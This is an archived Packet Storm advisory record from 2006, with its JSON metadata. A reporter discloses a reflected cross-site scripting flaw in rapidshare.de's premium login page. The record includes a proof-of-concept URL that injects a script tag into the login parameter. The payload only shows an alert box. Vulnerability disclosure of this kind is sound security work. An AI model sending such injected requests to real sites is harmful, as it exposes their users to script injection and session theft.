ID PACKETSTORM:43474 Type packetstorm Reporter MoHaJaLi Modified 2006-01-30T00:00:00
Description
`Hello All..
i found an XSS vulnerability in the widely known file hosting company :
http://rapidshare.de
The Vulnerability is in the premium members area:
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi
and it goes like this:
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=XSSHERE&password=anything
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert("XSS%20IN%20RAPIDSHARE%20BY%20MOHAJALI");</script>&password=anything
http://mohajali.lezr.org
Salam
--
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)
`
{"hash": "30c0cb37778e32de3f8dc442627a730ee25c9bfbdc70dca3f78002cd5e0dc31e", "sourceHref": "https://packetstormsecurity.com/files/download/43474/rapidXSS.txt", "title": "rapidXSS.txt", "id": "PACKETSTORM:43474", "published": "2006-01-30T00:00:00", "description": "", "modified": "2006-01-30T00:00:00", "sourceData": "`Hello All.. \n \ni found an XSS vulnerability in the widely known file hosting company : \nhttp://rapidshare.de \n \nThe Vulnerability is in the premium members area: \nhttps://ssl.rapidshare.de/cgi-bin/premiumzone.cgi \n \nand it goes like this: \nhttps://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=XSSHERE&password=anything \n \nhttps://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert(\"XSS%20IN%20RAPIDSHARE%20BY%20MOHAJALI\");</script>&password=anything \n \n \n \nhttp://mohajali.lezr.org \n \nSalam \n-- \n(r).....Now I Am Become Death....The Destroyer Of Worlds....(c) \n`\n", "reporter": "MoHaJaLi", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9074356cb096b36d5c2a40a277a5f132"}, {"key": "modified", "hash": "e0039a9ca53e427707fb245d37fa52da"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "e0039a9ca53e427707fb245d37fa52da"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "1dfea07d80a62e42aa026cb8469bf7b6"}, {"key": "sourceData", "hash": "5578cf6b4552e4e2a91a2e80ad270aa4"}, {"key": "sourceHref", "hash": "0d0107a680a80da5d2dbee9dbcd5852e"}, {"key": "title", "hash": "913575f8ff30d6216ea1d920d591e2bb"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/43474/rapidXSS.txt.html", "lastseen": "2016-11-03T10:21:25", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}